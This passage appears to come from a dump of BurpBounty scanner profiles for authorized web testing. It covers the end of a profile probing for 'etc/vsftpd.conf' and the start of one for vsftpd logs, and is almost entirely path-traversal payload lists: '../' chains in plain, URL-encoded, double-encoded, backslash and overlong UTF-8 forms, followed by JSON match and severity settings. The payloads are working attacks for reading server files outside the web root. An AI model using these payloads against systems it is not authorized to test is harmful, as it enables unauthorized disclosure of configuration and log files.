"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..//{FILE}",
"true,..//..//{FILE}",
"true,..//..//..//{FILE}",
"true,..//..//..//..//{FILE}",
"true,..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//{FILE}",
"true,..//..//..//..//..//..//..//..//{FILE}",
"true,..///{FILE}",
"true,..///..///{FILE}",
"true,..///..///..///{FILE}",
"true,..///..///..///..///{FILE}",
"true,..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///{FILE}",
"true,..///..///..///..///..///..///..///..///{FILE}",
"true,..\\\\{FILE}",
"true,..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}",
"true,./\\/./{FILE}",
"true,./\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",
"true,.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}",
"true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,./../{FILE}",
"true,./.././../{FILE}",
"true,./.././.././../{FILE}",
"true,./.././.././.././../{FILE}",
"true,./.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././../{FILE}",
"true,./.././.././.././.././.././.././.././../{FILE}",
"true,.\\..\\{FILE}",
"true,.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",
"true,.//..//{FILE}",
"true,.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
"true,.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",
"true,../{FILE}",
"true,../..//{FILE}",
"true,../..//../{FILE}",
"true,../..//../..//{FILE}",
"true,../..//../..//../{FILE}",
"true,../..//../..//../..//{FILE}",
"true,../..//../..//../..//../{FILE}",
"true,../..//../..//../..//../..//{FILE}",
"true,..\\{FILE}",
"true,..\\..\\\\{FILE}",
"true,..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}",
"true,..///{FILE}",
"true,../..///{FILE}",
"true,../..//..///{FILE}",
"true,../..//../..///{FILE}",
"true,../..//../..//..///{FILE}",
"true,../..//../..//../..///{FILE}",
"true,../..//../..//../..//..///{FILE}",
"true,../..//../..//../..//../..///{FILE}",
"true,..\\\\\\{FILE}",
"true,..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}",
"true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Example config file"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Linux-vsftpd-conf",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "Linux-vsftpd-conf",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [
{
"type": "Payload",
"match": "{FILE}",
"replace": "etc/vsftpd.conf",
"regex": "String"
}
],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Linux-vsftpd-log.bb | [
{
"ProfileName": "Linux-vsftpd-log",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@Sy3Omda",
"Payloads": [
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,..%c0%af{FILE}",
"true,..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae/{FILE}",
